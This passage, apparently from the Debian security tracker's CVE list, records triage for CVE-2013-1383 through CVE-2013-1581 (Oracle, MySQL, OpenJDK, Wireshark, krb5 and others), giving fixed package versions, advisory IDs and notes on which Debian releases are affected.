NOT-FOR-US: Oracle Financial Services CVE-2013-1559 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1558 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1557 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1556 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1555 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5. ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1554 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...) NOT-FOR-US: Oracle Database Server CVE-2013-1553 (Unspecified vulnerability in the Oracle Web Services Manager component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1552 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.2 ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1551 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-1550 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-1549 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1548 (Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows re ...) {DSA-2780-1} - mysql-5.5 (Only affects MySQL 5.1) - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1547 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1546 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1545 (Unspecified vulnerability in the Oracle HTTP Server component in Oracl ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1544 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1543 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-1542 (Unspecified vulnerability in the Oracle Containers for J2EE component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Finacial Services CVE-2013-1540 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1539 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services CVE-2013-1538 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...) NOT-FOR-US: Oracle Database Server CVE-2013-1537 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1536 (Unspecified vulnerability in the Oracle Transportation Management comp ...) NOT-FOR-US: Oracle Supply Chain Products CVE-2013-1535 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1534 (Unspecified vulnerability in the Workload Manager component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-1533 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle financial Services Software CVE-2013-1532 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1531 (Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.2 ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1530 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Solaris CVE-2013-1529 (Unspecified vulnerability in the Oracle WebCenter Interaction componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1528 (Unspecified vulnerability in the Oracle HRMS component in Oracle E-Bus ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1527 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-1526 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows re ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1525 (Unspecified vulnerability in the Oracle Retail Integration Bus compone ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-1524 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1523 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.1 ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1522 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1521 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.2 ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1520 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture O ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-1519 (Unspecified vulnerability in the Application Express component in Orac ...) NOT-FOR-US: Oracle Database Server CVE-2013-1518 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1517 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1516 (Unspecified vulnerability in the Oracle WebCenter Capture component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1515 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Only affects 3.x) CVE-2013-1514 (Unspecified vulnerability in the Oracle Containers for J2EE component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1513 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-1512 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows re ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1511 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.1 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1510 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...) NOT-FOR-US: Oracle Siebel CVE-2013-1509 (Unspecified vulnerability in the Oracle WebCenter Sites component in O ...) NOT-FOR-US: Oracle Fusion CVE-2013-1508 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Only affects 3.x) CVE-2013-1507 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1506 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 a ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1505 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle FLEXCUBE CVE-2013-1504 (Unspecified vulnerability in the Oracle WebLogic Server component in O ...) NOT-FOR-US: Oracle Fusion CVE-2013-1503 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion CVE-2013-1502 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-1501 (Unspecified vulnerability in the Oracle iStore component in Oracle E-B ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1500 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-1499 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Solaris CVE-2013-1498 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1497 (Unspecified vulnerability in the Oracle COREid Access component in Ora ...) NOT-FOR-US: Oracle Fusion CVE-2013-1496 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1495 (asr in Oracle Auto Service Request in Oracle Support Tools before 4.3. ...) NOT-FOR-US: Oracle Auto Service Request CVE-2013-1494 (Unspecified vulnerability in Oracle Sun Solaris 10, when running on SP ...) NOT-FOR-US: Solaris CVE-2013-1493 (The color management (CMM) functionality in the 2D component in Oracle ...) - openjdk-6 6b27-1.12.4-1 - openjdk-7 7u3-2.1.7-1 CVE-2013-1492 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5 ...) {DSA-2780-1} - mysql-5.1 (bug #712059) - mysql-5.5 5.5.30+dfsg-1 - cyassl (Fixed before initial upload to archive) NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2013_1492_buffer_overflow CVE-2013-1491 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-1490 (Unspecified vulnerability in Oracle Java SE 7 Update 11 (JRE 1.7.0_11- ...) - openjdk-6 (Not exploitable in OpenJDK6) - openjdk-7 (Icedtea 2.3 not affected) CVE-2013-1489 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1488 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-1487 (Unspecified vulnerability in the Java Runtime Environment component in ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1486 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 6b27-1.12.3-1 CVE-2013-1485 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 (Only affects Java7) CVE-2013-1484 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 (Only affects Java7) CVE-2013-1483 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1482 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1481 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Icedtea uses a different sound implementation than Oracle Java) - openjdk-7 (Icedtea uses a different sound implementation than Oracle Java) CVE-2013-1480 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1479 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1478 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1477 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1476 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1475 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1474 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1473 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1472 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1471 (Multiple cross-site scripting (XSS) vulnerabilities in admin/FEAdmin.h ...) NOT-FOR-US: Fortinet FortiMail CVE-2013-1581 (The dissect_pft_fec_detailed function in epan/dissectors/packet-dcp-et ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1580 (The dissect_cmstatus_tlv function in plugins/docsis/packet-cmstatus.c ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1579 (The rtps_util_add_bitmap function in epan/dissectors/packet-rtps.c in ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1578 (The dissect_pw_eth_heuristic function in epan/dissectors/packet-pw-eth ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1577 (The dissect_sip_p_charging_func_addresses function in epan/dissectors/ ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1576 (The dissect_sdp_media_attribute function in epan/dissectors/packet-sdp ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1575 (The dissect_r3_cmd_alarmconfigure function in epan/dissectors/packet-a ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1574 (The dissect_bthci_eir_ad_data function in epan/dissectors/packet-bthci ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1573 (The csnStreamDissector function in epan/dissectors/packet-csn1.c in th ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1572 (The dissect_oampdu_event_notification function in epan/dissectors/pack ...) {DLA-497-1} - wireshark 1.8.6-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-1470 (Cross-site scripting (XSS) vulnerability in calendar/index.php in the ...) NOTE: There was a RFP long time ago, bug #203818 NOTE: https://www.htbridge.com/advisory/HTB23143 NOT-FOR-US: Geeklog CVE-2013-1469 (Directory traversal vulnerability in install.php in Piwigo before 2.4. ...) - piwigo [squeeze] - piwigo (Unsupported in squeeze-lts) NOTE: Request to mark the package as unsupported in #779104 NOTE: https://www.htbridge.com/advisory/HTB23144 CVE-2013-1468 (Cross-site request forgery (CSRF) vulnerability in the LocalFiles Edit ...) - piwigo [squeeze] - piwigo (Unsupported in squeeze-lts) NOTE: Request to mark the package as unsupported in #779104 NOTE: https://www.htbridge.com/advisory/HTB23144 CVE-2013-1467 RESERVED CVE-2013-1466 (Multiple cross-site scripting (XSS) vulnerabilities in glFusion before ...) NOT-FOR-US: glFusion CVE-2013-1465 (The Cubecart::_basket method in classes/cubecart.class.php in CubeCart ...) NOT-FOR-US: CubeCart CVE-2013-1464 (Cross-site scripting (XSS) vulnerability in assets/player.swf in the A ...) {DSA-2772-1} - typo3-src 4.5.29+dfsg1-1 [squeeze] - typo3-src (Unsupported in squeeze-lts) CVE-2013-1463 (Cross-site scripting (XSS) vulnerability in js/tabletools/zeroclipboar ...) NOT-FOR-US: WordPress plugin CVE-2013-1462 (Integer signedness error in the ExecuteSoapAction function in the SOAP ...) - miniupnpd (Fixed before initial upload to archive) CVE-2013-1461 (The ExecuteSoapAction function in the SOAPAction handler in the HTTP s ...) - miniupnpd (Fixed before initial upload to archive) CVE-2013-1460 RESERVED CVE-2013-1459 RESERVED CVE-2013-1458 RESERVED CVE-2013-1457 RESERVED CVE-2013-1456 RESERVED CVE-2013-1455 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive infor ...) NOT-FOR-US: Joomla! CVE-2013-1454 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive infor ...) NOT-FOR-US: Joomla! CVE-2013-1453 (plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 ...) NOT-FOR-US: Joomla! CVE-2013-1452 RESERVED CVE-2013-4696 REJECTED CVE-2013-1451 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings configura ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1450 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings configura ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1449 RESERVED CVE-2013-1448 RESERVED CVE-2013-1447 (OpenJPEG 1.3 and earlier allows remote attackers to cause a denial of ...) {DSA-2808-1} - openjpeg 1.3+dfsg-4.7 (bug #731237) CVE-2013-1446 RESERVED CVE-2013-1445 (The Crypto.Random.atfork function in PyCrypto before 2.6.1 does not pr ...) {DSA-2781-1} - python-crypto 2.6.1-1 CVE-2013-1444 (A certain Debian patch for txt2man 1.5.5, as used in txt2man 1.5.5-2, ...) - txt2man 1.5.5-4.1 (bug #724614) [wheezy] - txt2man (Minor issue) [squeeze] - txt2man (Minor issue) CVE-2013-1443 (The authentication framework (django.contrib.auth) in Django 1.4.x bef ...) {DSA-2758-1} - python-django 1.5.4-1 (bug #723043) CVE-2013-1442 (Xen 4.0 through 4.3.x, when using AVX or LWP capable CPUs, does not pr ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) NOTE: advisory say: In Xen 4.0.2 through 4.0.4 as well as in Xen 4.1.x XSAVE support is disabled by default CVE-2013-1441 (econvert in ExactImage 0.8.9 and earlier does not properly initialize ...) {DSA-2754-1} - exactimage 0.8.9-2 NOTE: a different issue than CVE-2013-1438 CVE-2013-1440 RESERVED CVE-2013-1439 (The "faster LJPEG decoder" in libraw 0.13.x, 0.14.x, and 0.15.x before ...) - libraw 0.15.4-1 (bug #721338) [wheezy] - libraw (Minor issue) [squeeze] - libraw (Minor issue) - libkdcraw 4:4.10.5-2 (bug #721340) [wheezy] - libkdcraw (Minor issue) - darktable 1.2.2-2 (bug #721339) [wheezy] - darktable 1.0.4-1+deb7u2 CVE-2013-1438 (Unspecified vulnerability in dcraw 0.8.x through 0.8.9, as used in lib ...) {DSA-2748-1} - libraw 0.15.4-1 (bug #721231) [wheezy] - libraw (Minor issue) [squeeze] - libraw (Minor issue) - libkdcraw 4:4.10.5-2 (bug #721239) [wheezy] - libkdcraw (Minor issue) - darktable 1.2.2-2 (bug #721233) [wheezy] - darktable 1.0.4-1+deb7u2 - dcraw 9.28-1 (unimportant; bug #721232) - ufraw 0.19.2-2 (bug #721234) [wheezy] - ufraw (end-user app) [squeeze] - ufraw (end-user app) - xbmc 2:13.2+dfsg1-5 (unimportant; bug #721235) - exactimage 0.8.9-1 (bug #721236) - rawstudio (unimportant; bug #721237) - rawtherapee (unimportant; bug #721238) NOTE: Starting with 2:13.2+dfsg1-5 xbmc is a transitional package CVE-2013-1437 (Eval injection vulnerability in the Module-Metadata module before 1.00 ...) - perl 5.18.1-2 [wheezy] - perl (Bug was introduced later) [squeeze] - perl (Does not yet contain Module::Metadata) - libmodule-metadata-perl 1.000015-1 [wheezy] - libmodule-metadata-perl 1.000009-1+deb7u1 NOTE: this is by 'design', but previous to version Module::Metadata 1.000015 NOTE: the statement was This module provides a standard way to gather metadata NOTE: about a .pm file *without* executing unsafe code. CVE-2013-1436 (The XMonad.Hooks.DynamicLog module in xmonad-contrib before 0.11.2 all ...) - xmonad-contrib 0.11.2-1 (low) [squeeze] - xmonad-contrib (Minor issue) [wheezy] - xmonad-contrib 0.10-4~deb7u1 CVE-2013-1435 ((1) snmp.php and (2) rrd.php in Cacti before 0.8.8b allows remote atta ...) {DSA-2739-1} - cacti 0.8.8b+dfsg-1 NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7392 NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7393 CVE-2013-1434 (Multiple SQL injection vulnerabilities in (1) api_poller.php and (2) u ...) {DSA-2739-1} - cacti 0.8.8b+dfsg-1 NOTE: http://svn.cacti.net/viewvc?view=rev&revision=7394 CVE-2013-1433 REJECTED CVE-2013-1432 (Xen 4.1.x and 4.2.x, when the XSA-45 patch is in place, does not prope ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (Unsupported in squeeze-lts) NOTE: All Xen versions having the XSA-45/CVE-2013-1918 fixes applied are vulnerable CVE-2013-1431 (The Wocky module in Telepathy Gabble before 0.16.6 and 0.17.x before 0 ...) {DSA-2702-1} - telepathy-gabble 0.16.6-1 CVE-2013-1430 (An issue was discovered in xrdp before 0.9.1. When successfully loggin ...) - xrdp 0.9.1~2016121126+git5171fa7-1 [jessie] - xrdp (Minor issue) [wheezy] - xrdp (Minor issue) NOTE: https://github.com/neutrinolabs/xrdp/pull/497 NOTE: When successfully logging in using RDP into a xrdp session, the file NOTE: ~/.vnc/sesman_${username}_passwd is created. Its content is the NOTE: equivalent of the users clear text password, DES encrypted with a known NOTE: key. CVE-2013-1429 (Lintian before 2.5.12 allows remote attackers to gather information ab ...) - lintian 2.5.10.5 (bug #705553; unimportant) CVE-2013-1428 (Stack-based buffer overflow in the receive_tcppacket function in net_p ...) {DSA-2663-1} - tinc 1.0.19-3 CVE-2013-1427 (The configuration file for the FastCGI PHP support for lighttpd before ...) {DSA-2649-1} - lighttpd 1.4.31-4 CVE-2013-1426 (Cross-site Scripting (XSS) in Mahara before 1.5.9 and 1.6.x before 1.6 ...) - mahara (low) [wheezy] - mahara (Minor issue) [squeeze] - mahara (Minor issue) NOTE: https://bugs.launchpad.net/mahara/+bug/1153423 CVE-2013-1425 (ldap-git-backup before 1.0.4 exposes password hashes due to incorrect ...) - ldap-git-backup 1.0.4-1 (bug #699227) CVE-2013-1424 [matplotlib buffer overrun] RESERVED - matplotlib 1.4.2-3.1 (low; bug #775691) [wheezy] - matplotlib (Minor issue) [squeeze] - matplotlib (Minor issue) CVE-2013-1423 ((1) contrib/gforge-3.0-cronjobs.patch, (2) cronjobs/homedirs.php, (3) ...) {DSA-2633-1} - fusionforge 5.2.1+20130227-1 CVE-2013-1422 (webcalendar before 1.2.7 shows the reason for a failed login (e.g., "n ...) - webcalendar CVE-2013-1421 (Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar ...) - webcalendar CVE-2013-1420 (Multiple cross-site scripting (XSS) vulnerabilities in GetSimple CMS b ...) NOT-FOR-US: GetSimple CMS CVE-2013-1419 RESERVED CVE-2013-1418 (The setup_server_realm function in main.c in the Key Distribution Cent ...) {DLA-1265-1} - krb5 1.11.3+dfsg-3+nmu1 (low; bug #728845) [squeeze] - krb5 (Minor issue) NOTE: http://krbdev.mit.edu/rt/Ticket/Display.html?id=7757 NOTE: https://github.com/krb5/krb5/commit/5d2d9a1abe46a2c1a8614d4672d08d9d30a5f8bf CVE-2013-1417 (do_tgs_req.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (a ...) - krb5 1.11.3+dfsg-3+nmu1 (low; bug #730085) [squeeze] - krb5 (Vulnerable code only present in 1.11.x) [wheezy] - krb5 (Vulnerable code only present in 1.11.x) NOTE: https://github.com/krb5/krb5/commit/4c023ba43c16396f0d199e2df1cfa59b88b62acc CVE-2013-1416 (The prep_reprocess_req function in do_tgs_req.c in the Key Distributio ...) - krb5 1.10.1+dfsg-5 (low; bug #704775) [squeeze] - krb5 (Minor issue) CVE-2013-1415 (The pkinit_check_kdc_pkid function in plugins/preauth/pkinit/pkinit_cr ...) - krb5 1.10.1+dfsg-4 (low) [squeeze] - krb5 (Minor issue) NOTE: https://github.com/krb5/krb5/commit/c773d3c775e9b2d88bcdff5f8a8ba88d7ec4e8ed NOTE: https://github.com/krb5/krb5/commit/b71f8c4aacea8849ceaf31a2fa95e143f3943097 CVE-2013-1414 (Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet ...) NOT-FOR-US: Fortinet FortiOS on FortiGate firewall devices CVE-2013-1413 (Multiple cross-site scripting (XSS) vulnerabilities in synetics i-doit ...) NOT-FOR-US: synetics i-doit CVE-2013-1412 (DataLife Engine (DLE) 9.7 allows remote attackers to execute arbitrary ...) NOT-FOR-US: DataLife Engine CVE-2013-1411 RESERVED CVE-2013-1410 (Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities ...) NOT-FOR-US: Perforce CVE-2013-1409 (Cross-site scripting (XSS) vulnerability in the CommentLuv plugin befo ...) NOT-FOR-US: CommentLuv plugin for Wordpress CVE-2013-1408 (Multiple SQL injection vulnerabilities in the Wysija Newsletters plugi ...) NOT-FOR-US: WordPress plugin wysija-newsletters CVE-2013-1407 (Multiple cross-site scripting (XSS) vulnerabilities in the Events Mana ...) NOT-FOR-US: WordPress plugin Events Master Pro CVE-2013-1406 (The Virtual Machine Communication Interface (VMCI) implementation in v ...) NOT-FOR-US: VMware Workstation, Fusion, View, ESXi, ESX CVE-2013-1405 (VMware vCenter Server 4.0 before Update 4b and 4.1 before Update 3a, V ...) NOT-FOR-US: VMware CVE-2013-1404 RESERVED CVE-2013-1403 RESERVED CVE-2013-1402 (DigiLIBE 3.4 and possibly other versions sends a redirect but does not ...) NOT-FOR-US: DigiLIBE CVE-2013-1401 (Multiple security bypass vulnerabilities in the editAnswer, deleteAnsw ...) NOT-FOR-US: WordPress Poll Plugin for WordPress CVE-2013-1400 (Multiple SQL injection vulnerabilities in CWPPoll.js in WordPress Poll ...) NOT-FOR-US: WordPress Poll Plugin for WordPress CVE-2013-0243 (haskell-tls-extra before 0.6.1 has Basic Constraints attribute vulnera ...) - haskell-tls-extra 0.4.6.1-1 (bug #698545) CVE-2013-1399 (Multiple cross-site request forgery (CSRF) vulnerabilities in the (1) ...) - puppet (Only affects Puppet Enterprise) CVE-2013-1398 (The pe_mcollective module in Puppet Enterprise (PE) before 2.7.1 does ...) - puppet (Only affects Puppet Enterprise) CVE-2013-1397 (Symfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x remote atta ...) - php-symfony2-yaml (Only affects versions 2.0, 2.1, 2.2) CVE-2013-1396 RESERVED CVE-2013-1395 RESERVED CVE-2013-1394 RESERVED CVE-2013-1393 (Cross-site scripting (XSS) vulnerability in the CurvyCorners module 6. ...) NOT-FOR-US: Drupal module CurvyCorners CVE-2013-1392 RESERVED CVE-2013-1391 (Authentication bypass vulnerability in the the web interface in Hunt C ...) NOT-FOR-US: DVR systems CVE-2013-1390 RESERVED CVE-2013-1389 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 11, 9. ...) NOT-FOR-US: Adobe ColdFusion 9.0 CVE-2013-1388 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9. ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-1387 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9. ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-1386 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1385 (Adobe Shockwave Player before 12.0.2.122 does not prevent access to ad ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1384 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1383 (Buffer overflow in Adobe Shockwave Player before 12.0.2.122 allows att ...) NOT-FOR-US: Adobe 